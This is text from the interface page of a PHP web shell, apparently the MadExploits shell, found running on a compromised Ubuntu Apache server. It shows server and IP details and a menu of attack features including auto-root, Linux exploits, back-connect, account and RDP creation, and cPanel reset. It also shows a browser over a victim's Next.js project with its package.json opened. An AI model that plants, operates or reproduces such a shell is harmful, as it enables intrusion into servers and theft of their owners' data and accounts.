Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ayush23027 /
ssl /
orco_website /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
.next
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
out
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.env.development
276
B
-rw-r--r--
.env.production
240
B
-rw-r--r--
.eslintrc.json
40
B
-rw-r--r--
.gitignore
392
B
-rw-r--r--
README.md
247
B
-rw-r--r--
api.php
1.42
KB
-rw-r--r--
next-env.d.ts
201
B
-rw-r--r--
next.config.mjs
426
B
-rw-r--r--
package-lock.json
183.75
KB
-rw-r--r--
package.json
839
B
-rw-r--r--
tsconfig.json
578
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "orco", "version": "0.1.0", "private": true, "scripts": { "dev": "next dev", "export": "export NODE_ENV=production && export BUILD_MODE=static && next build && cp ./api.php ./out/api.php", "build": "export NODE_ENV=production && export BUILD_MODE=dynamic && next build", "start": "export NODE_ENV=production && nohup next start -p 6500 > /dev/null 2>&1 &", "lint": "next lint" }, "dependencies": { "axios": "^1.7.2", "cesium": "^1.118.2", "express": "^4.19.2", "next": "14.2.3", "react": "^18", "react-dom": "^18", "satellite.js": "^5.0.0" }, "devDependencies": { "@types/cesium": "^1.70.0", "@types/node": "^20", "@types/react": "^18", "@types/react-dom": "^18", "eslint": "^8", "eslint-config-next": "14.2.3", "typescript": "^5" } }
Close